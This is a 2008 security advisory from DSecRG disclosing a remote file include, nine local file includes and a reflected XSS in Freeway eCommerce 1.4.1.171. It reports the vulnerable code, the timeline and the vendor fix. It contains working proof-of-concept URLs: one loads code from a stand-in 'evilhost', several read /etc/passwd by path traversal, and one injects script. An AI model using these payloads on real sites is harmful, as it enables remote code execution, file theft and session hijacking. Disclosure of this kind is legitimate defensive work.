DSECRG-08-036.txt

`  
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-036  
  
  
Application: Freeway eCommerce  
Versions Affected: 1.4.1.171  
Vendor URL: http://www.openfreeway.org/  
Bugs: RFI, Multiple LFI, XSS  
Exploits: YES  
Reported: 27.06.2008  
Second report: 04.07.2008  
Vendor response: 06.07.2008  
Solution: YES   
Date of Public Advisory: 18.08.2008  
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)  
  
  
  
Description  
***********  
  
Freeway eCommerce system has multiple security vulnerabilities:  
  
1. Multiple Remote/Local File Include  
2. Linked XSS vulnerability   
  
  
Details  
*******  
  
1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities.  
  
1.1 Remote File Include vulnerability found in script admin/create_order_new.php  
  
Vulnerable GET parameter "include_page".  
  
Code  
****  
#################################################  
  
...  
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';  
...  
  
if($command!="")  
{  
switch($command){  
...  
case 'include_page':  
require($HTTP_GET_VARS['include_page']);  
break;  
...  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php  
  
  
1.2 Local File Include vulnerability found in script includes/events_application_top.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL);   
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.3 Local File Include vulnerabilities found in scripts   
  
includes/languages/english/account.php  
includes/languages/french/account.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
require(DIR_WS_LANGUAGES . $language . "/events_account.php");  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.4 Local File Include vulnerability found in script includes/languages/french/account_newsletters.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
require(DIR_WS_LANGUAGES . $language . "/events_account_newsletters.php");  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.5 Local File Include vulnerability found in script includes/modules/faqdesk/faqdesk_article_require.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
//require('includes/application_top.php');  
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE);  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.6 Local File Include vulnerability found in script includes/modules/newsdesk/newsdesk_article_require.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
//require('includes/application_top.php');  
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE);  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.7 Local File Include vulnerability found in script templates/Freeway/boxes/card1.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
require(DIR_WS_LANGUAGES . $language . '/cards1_box.php');  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.8 Local File Include vulnerability found in script templates/Freeway/boxes/loginbox.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
require(DIR_WS_LANGUAGES . $language . '/loginbox.php');  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.9 Local File Include vulnerability found in script templates/Freeway/boxes/whos_online.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
require(DIR_WS_LANGUAGES . $language . '/whos_onlinebox.php');  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
1.10 Local File Include vulnerability found in script templates/Freeway/mainpage_modules/mainpage.php  
  
Successful exploitation requires that "register_globals" is enabled.  
  
Code  
****  
#################################################  
  
include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFINE_MAINPAGE);  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00  
  
  
---------------------------------------------------------------------  
  
  
2. Linked XSS vulnerability found in script admin/search_links.php  
  
GET parameter "search_link"  
  
Example:  
  
http://[server]/[installdir]/admin/search_links.php?search_link="<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>  
  
  
  
Solution  
********  
  
Vendor fix this flaw on 13.08.2008. New version of Freeway 1.4.2.197 [Sathish] can be download here:  
  
http://www.openfreeway.org/download.html  
  
Change Log:  
  
http://www.openfreeway.org/download/change-log.html  
  
  
  
About  
*****  
  
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsec [dot] ru  
http://www.dsec.ru (in Russian)  
  
  
`